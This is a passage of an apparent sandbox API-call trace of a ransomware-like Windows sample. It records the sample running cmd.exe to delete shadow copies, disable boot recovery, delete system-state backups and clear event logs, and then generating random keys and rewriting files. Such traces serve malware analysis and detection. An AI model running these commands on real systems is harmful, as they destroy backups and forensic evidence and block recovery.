lpIDList=0x77c73cce, lpClass=0x208, hkeyClass=0x210, dwHotKey=0x541d0a, hIcon=0x541d08, hMonitor=0x541d08, hProcess=0x0)) returned 1 [0066.741] Sleep (dwMilliseconds=0x3e8) [0068.335] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x219fb30*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x219fae0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x219fae0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0068.335] Sleep (dwMilliseconds=0x64) [0068.444] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c bcdedit /set {default} recoveryenabled No", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x219fb30*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x219fae0 | out: lpCommandLine="/c bcdedit /set {default} recoveryenabled No", lpProcessInformation=0x219fae0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0068.444] Sleep (dwMilliseconds=0x64) [0068.553] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x219fb30*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x219fae0 | out: lpCommandLine="/c bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpProcessInformation=0x219fae0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0068.553] Sleep (dwMilliseconds=0x64) [0068.662] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c wbadmin DELETE SYSTEMSTATEBACKUP", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x219fb30*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x219fae0 | out: lpCommandLine="/c wbadmin DELETE SYSTEMSTATEBACKUP", lpProcessInformation=0x219fae0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0068.662] Sleep (dwMilliseconds=0x64) [0068.771] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x219fb30*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x219fae0 | out: lpCommandLine="/c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest", lpProcessInformation=0x219fae0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0068.771] Sleep (dwMilliseconds=0x64) [0068.882] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c wmic SHADOWCOPY /nointeractive", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x219fb30*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x219fae0 | out: lpCommandLine="/c wmic SHADOWCOPY /nointeractive", lpProcessInformation=0x219fae0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0068.882] Sleep (dwMilliseconds=0x64) [0069.069] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c wevtutil cl security", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x219fb30*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x219fae0 | out: lpCommandLine="/c wevtutil cl security", lpProcessInformation=0x219fae0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0069.069] Sleep (dwMilliseconds=0x64) [0069.177] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c wevtutil cl system", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x219fb30*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x219fae0 | out: lpCommandLine="/c wevtutil cl system", lpProcessInformation=0x219fae0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0069.177] Sleep (dwMilliseconds=0x64) [0069.286] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c wevtutil cl application", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x219fb30*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x219fae0 | out: lpCommandLine="/c wevtutil cl application", lpProcessInformation=0x219fae0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0069.286] Sleep (dwMilliseconds=0x64) [0069.395] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x219fb30*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x219fae0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x219fae0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0069.395] Sleep (dwMilliseconds=0x64) [0069.505] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c bcdedit /set {default} recoveryenabled No", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x219fb30*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x219fae0 | out: lpCommandLine="/c bcdedit /set {default} recoveryenabled No", lpProcessInformation=0x219fae0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0069.505] Sleep (dwMilliseconds=0x64) [0069.614] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x219fb30*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x219fae0 | out: lpCommandLine="/c bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpProcessInformation=0x219fae0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0069.614] Sleep (dwMilliseconds=0x64) [0069.723] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c wbadmin DELETE SYSTEMSTATEBACKUP", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x219fb30*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x219fae0 | out: lpCommandLine="/c wbadmin DELETE SYSTEMSTATEBACKUP", lpProcessInformation=0x219fae0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0069.723] Sleep (dwMilliseconds=0x64) [0069.832] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x219fb30*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x219fae0 | out: lpCommandLine="/c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest", lpProcessInformation=0x219fae0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0069.832] Sleep (dwMilliseconds=0x64) [0069.941] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c wmic SHADOWCOPY /nointeractive", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x219fb30*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x219fae0 | out: lpCommandLine="/c wmic SHADOWCOPY /nointeractive", lpProcessInformation=0x219fae0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0069.941] Sleep (dwMilliseconds=0x64) [0070.051] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c wevtutil cl security", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x219fb30*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x219fae0 | out: lpCommandLine="/c wevtutil cl security", lpProcessInformation=0x219fae0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0070.051] Sleep (dwMilliseconds=0x64) [0070.160] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c wevtutil cl system", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x219fb30*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x219fae0 | out: lpCommandLine="/c wevtutil cl system", lpProcessInformation=0x219fae0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0070.160] Sleep (dwMilliseconds=0x64) [0073.422] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c wevtutil cl application", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x219fb30*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x219fae0 | out: lpCommandLine="/c wevtutil cl application", lpProcessInformation=0x219fae0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0073.424] Sleep (dwMilliseconds=0x64) [0073.788] wvsprintfA (in: param_1=0x219e600, param_2="Volume Shadow Copy & Event log clean", arglist=0x219eb40 | out: param_1="Volume Shadow Copy & Event log clean") returned 36 [0073.788] wsprintfA (in: param_1=0x219e600, param_2="%s\r\n" | out: param_1="Volume Shadow Copy & Event log clean\r\n") returned 38 [0073.789] GetLocalTime (in: lpSystemTime=0x219eb00 | out: lpSystemTime=0x219eb00*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x6, wDay=0x1c, wHour=0x8, wMinute=0x13, wSecond=0x34, wMilliseconds=0x14a)) [0073.789] wsprintfA (in: param_1=0x219ea00, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[08:19:52] ") returned 11 [0073.790] SetThreadUILanguage (LangId=0x409) returned 0x409 [0073.790] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xa) returned 1 [0073.984] WriteFile (in: hFile=0x7, lpBuffer=0x219ea00*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x219eb2c, lpOverlapped=0x0 | out: lpBuffer=0x219ea00*, lpNumberOfBytesWritten=0x219eb2c*=0xb, lpOverlapped=0x0) returned 1 [0073.985] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0073.985] WriteFile (in: hFile=0x7, lpBuffer=0x219e600*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x219eb2c, lpOverlapped=0x0 | out: lpBuffer=0x219e600*, lpNumberOfBytesWritten=0x219eb2c*=0x26, lpOverlapped=0x0) returned 1 [0073.985] GetConsoleWindow () returned 0x5011c [0073.985] IsWindowVisible (hWnd=0x5011c) returned 0 [0073.986] GetModuleHandleA (lpModuleName="kernel32") returned 0x76d30000 [0076.118] GetProcAddress (hModule=0x76d30000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x76d5d668 [0076.118] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0076.118] RtlExitUserThread (Status=0x0) Thread: id = 6 os_tid = 0xc0 Thread: id = 7 os_tid = 0x694 Thread: id = 9 os_tid = 0x67c Thread: id = 10 os_tid = 0x8a4 [0069.071] GetQueuedCompletionStatus (CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2d2fc0c, lpCompletionKey=0x2d2fc1c, lpOverlapped=0x2d2fc18, dwMilliseconds=0xffffffff) Thread: id = 11 os_tid = 0x8b4 [0069.071] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0147.457] CloseHandle (hObject=0x2a4) returned 1 [0147.457] free (_Block=0x1ff1e60) [0147.458] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0147.458] CloseHandle (hObject=0xec) returned 1 [0147.458] free (_Block=0x3ef0008) [0147.458] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0147.464] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xb57d, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0147.465] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0147.466] CloseHandle (hObject=0x2a8) returned 1 [0147.466] free (_Block=0x3d70450) [0147.466] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0147.467] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb12e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.468] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0147.469] CloseHandle (hObject=0x3cc) returned 1 [0147.469] free (_Block=0x3df0008) [0147.469] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0147.471] ReadFile (in: hFile=0x170, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x7214, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0147.472] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0147.473] CloseHandle (hObject=0x170) returned 1 [0147.473] free (_Block=0x3e70008) [0147.473] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0147.477] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.477] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.477] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0147.477] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.478] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.478] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0147.481] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.482] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.482] free (_Block=0x3e305b8) [0147.482] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.482] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.482] free (_Block=0x1fa91d0) [0147.482] free (_Block=0x1fa2ed8) [0147.482] free (_Block=0x1fa90b8) [0147.482] WriteFile (in: hFile=0x338, lpBuffer=0x3fb00ec*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8) returned 1 [0147.483] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0147.487] WriteFile (in: hFile=0x338, lpBuffer=0x3fb00ec*, nNumberOfBytesToWrite=0x5df0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8) returned 1 [0147.487] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0147.517] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x5b2a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.541] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0147.553] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.554] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.554] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0147.554] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.555] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.555] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0147.555] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.555] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.555] free (_Block=0x3e305b8) [0147.555] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.555] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.556] free (_Block=0x1fa91d0) [0147.556] free (_Block=0x1fa2ed8) [0147.556] free (_Block=0x1fa90b8) [0147.556] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0147.557] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0147.566] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x7d30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0147.566] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 